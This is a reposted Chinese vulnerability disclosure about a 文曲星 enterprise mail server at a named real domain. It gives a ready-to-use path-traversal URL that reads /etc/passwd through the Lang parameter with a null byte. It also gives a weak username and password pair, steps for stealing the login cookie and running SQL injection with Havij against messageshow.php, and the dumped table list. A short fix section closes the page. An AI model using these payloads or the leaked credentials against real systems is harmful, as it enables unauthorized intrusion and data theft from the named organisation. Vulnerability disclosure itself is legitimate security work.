网站地图    收藏   

主页 > 后端 > 网站安全 >

文曲星企业邮箱任意文件读取&SQL注入 - 网站安

来源:自学PHP网    时间:2015-04-16 23:15 作者: 阅读:

[导读] 文曲星企业邮箱服务器存在任意文件读取漏洞和SQL注入漏洞,可以读取 目录下任意文件(包括服务器配置、系统用户、网页源码等),并可读写所有数据库读取任意文件:(以 etc pass...

文曲星企业邮箱服务器存在任意文件读取漏洞和SQL注入漏洞,可以读取/目录下任意文件(包括服务器配置、系统用户、网页源码等),并可读写所有数据库

读取任意文件:(以/etc/passwd为例)

 

http://mail.ggv.com.cn/login.php?Lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00.php



SQL注入:

1.使用弱密码登录

 

USERNAME: hansin
PASSWORD: hansin@12



2.提取登录cookie(用havij或类似工具)

3.使用前一步获得的cookie注入:http://mail.ggv.com.cn/messageshow.php?id=3

http://mail.ggv.com.cn/login.php?Lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00.php



 

Current database
[4 tables]
+----------+
| address  |
| logs     |
| message  |
| personal |
+----------+

 

修复方案:

限制服务器运行用户的权限

修改涉及$_GET[]的页面,修补SQL注射漏洞

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论